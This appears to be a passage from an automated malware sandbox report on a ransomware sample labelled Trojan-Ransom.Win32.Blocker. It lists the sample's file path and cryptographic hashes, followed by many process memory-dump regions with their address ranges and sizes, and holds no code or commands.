                                          c001fddde794c2eb3cd67ed115bd5297f65f094e1f34fafbc9ec27c441f842af0a1f9014e3ed82095638417dda55b73535eea7f1f9d312a267f5ff52596f8923

                                        • \Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.kmzv-cd79ea54546cb156c0d0d6b9825fb692ece4c572bb09b5b0cd058e3bffd72bc9.exe

                                          Filesize

                                          1.5MB

                                          MD5

                                          72182ebdb195af232867608625be7f54

                                          SHA1

                                          b288a6f885885ff3cfc19434c6890b3fe9797666

                                          SHA256

                                          cd79ea54546cb156c0d0d6b9825fb692ece4c572bb09b5b0cd058e3bffd72bc9

                                          SHA512

                                          51bcd2ebfd137bd09cf3ebc9c193c1fde2cecc2625fda701a847a01bede57f27f8ab3158e03430d50a6f0c5f632109256dfde5cc0d0c032c96b402067f20b560

                                        • memory/404-131-0x0000000000400000-0x0000000000415000-memory.dmp

                                          Filesize

                                          84KB

                                        • memory/544-138-0x0000000000410000-0x00000000004D9000-memory.dmp

                                          Filesize

                                          804KB

                                        • memory/544-139-0x00000000004E0000-0x000000000057F000-memory.dmp

                                          Filesize

                                          636KB

                                        • memory/544-140-0x00000000001D0000-0x00000000001EF000-memory.dmp

                                          Filesize

                                          124KB

                                        • memory/544-141-0x0000000000660000-0x000000000078D000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/544-142-0x0000000000AB0000-0x0000000000BB9000-memory.dmp

                                          Filesize

                                          1.0MB

                                        • memory/544-144-0x00000000008E0000-0x00000000008F7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1048-95-0x0000000000400000-0x000000000041B000-memory.dmp

                                          Filesize

                                          108KB

                                        • memory/1048-7675-0x0000000000400000-0x000000000041B000-memory.dmp

                                          Filesize

                                          108KB

                                        • memory/1060-3065-0x0000000000400000-0x0000000000550000-memory.dmp

                                          Filesize

                                          1.3MB

                                        • memory/1060-22845-0x0000000000400000-0x0000000000550000-memory.dmp

                                          Filesize

                                          1.3MB

                                        • memory/1060-54-0x0000000000400000-0x0000000000550000-memory.dmp

                                          Filesize

                                          1.3MB

                                        • memory/1108-161-0x0000000000210000-0x0000000000227000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1108-163-0x0000000000210000-0x0000000000227000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1108-157-0x0000000000210000-0x0000000000227000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1108-159-0x0000000000210000-0x0000000000227000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1156-135-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1156-82-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1156-90-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1172-170-0x00000000001C0000-0x00000000001D7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1172-166-0x00000000001C0000-0x00000000001D7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1172-168-0x00000000001C0000-0x00000000001D7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1204-173-0x0000000003CF0000-0x0000000003D07000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1204-175-0x0000000003CF0000-0x0000000003D07000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1204-177-0x0000000003CF0000-0x0000000003D07000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1292-147-0x0000000000420000-0x00000000004E9000-memory.dmp

                                          Filesize

                                          804KB

                                        • memory/1292-150-0x0000000000670000-0x000000000079D000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/1292-149-0x00000000003C0000-0x00000000003DF000-memory.dmp

                                          Filesize

                                          124KB

                                        • memory/1292-151-0x00000000007A0000-0x0000000000811000-memory.dmp

                                          Filesize

                                          452KB

                                        • memory/1292-156-0x0000000001EC0000-0x0000000001ED7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1292-152-0x0000000000400000-0x0000000000417000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1292-145-0x0000000000400000-0x0000000000417000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1292-153-0x00000000021B0000-0x00000000022B9000-memory.dmp

                                          Filesize

                                          1.0MB

                                        • memory/1292-148-0x00000000004F0000-0x000000000058F000-memory.dmp

                                          Filesize

                                          636KB

                                        • memory/1520-184-0x0000000001E10000-0x0000000001E27000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1520-182-0x0000000001E10000-0x0000000001E27000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1520-180-0x0000000001E10000-0x0000000001E27000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1764-709-0x0000000000ED0000-0x0000000000EF4000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/1764-1694-0x0000000000AA0000-0x0000000000AE6000-memory.dmp

                                          Filesize

                                          280KB

                                        • memory/1836-96-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1836-98-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1836-128-0x0000000000400000-0x0000000000412000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/1960-6739-0x0000000003760000-0x0000000003770000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1960-93-0x0000000000400000-0x0000000000451000-memory.dmp

                                          Filesize

                                          324KB

                                        • memory/1960-36858-0x0000000000400000-0x0000000000451000-memory.dmp

                                          Filesize

                                          324KB

                                        • memory/1960-80-0x0000000000400000-0x0000000000451000-memory.dmp

                                          Filesize

                                          324KB

                                        • memory/1960-39673-0x0000000003760000-0x0000000003770000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2376-36857-0x0000000000400000-0x000000000071E000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/2376-71-0x0000000000400000-0x000000000071E000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/2376-70-0x0000000000400000-0x000000000071E000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/2376-91-0x0000000000400000-0x000000000071E000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/2376-69-0x0000000000400000-0x000000000071E000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/2376-67-0x0000000000400000-0x000000000071E000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/2620-4511-0x0000000000400000-0x00000000005F9000-memory.dmp

                                          Filesize

                                          2.0MB

                                        • memory/2620-6546-0x0000000000400000-0x00000000005F9000-memory.dmp

                                          Filesize

                                          2.0MB

                                        • memory/2620-92-0x0000000000400000-0x00000000005F9000-memory.dmp

                                          Filesize

                                          2.0MB

                                        • memory/2868-4512-0x0000000000400000-0x0000000000472000-memory.dmp

                                          Filesize

                                          456KB

                                        • memory/2868-94-0x0000000000400000-0x0000000000472000-memory.dmp

                                          Filesize

                                          456KB

                                        • memory/2872-6544-0x0000000000400000-0x000000000041D000-memory.dmp

                                          Filesize

                                          116KB

                                        • memory/2872-651-0x0000000000400000-0x000000000041D000-memory.dmp

                                          Filesize

                                          116KB

                                        • memory/2904-26146-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-27668-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-30325-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-30696-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-30721-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-31448-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-31441-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-31457-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-31479-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-33573-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-33572-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-34820-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-34894-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-8717-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-27719-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-30294-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-4951-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-4952-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-14008-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-26113-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-187-0x00000000020D0000-0x00000000020E7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/2904-14010-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-37-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-38-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/2904-189-0x00000000020D0000-0x00000000020E7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/2904-36-0x0000000140000000-0x00000001405E8000-memory.dmp

                                          Filesize

                                          5.9MB

                                        • memory/3368-6842-0x0000000004130000-0x0000000004140000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3368-6835-0x0000000002570000-0x0000000002580000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3584-6735-0x0000000000400000-0x0000000000451000-memory.dmp

                                          Filesize

                                          324KB

                                        • memory/3584-39672-0x0000000000400000-0x0000000000451000-memory.dmp

                                          Filesize

                                          324KB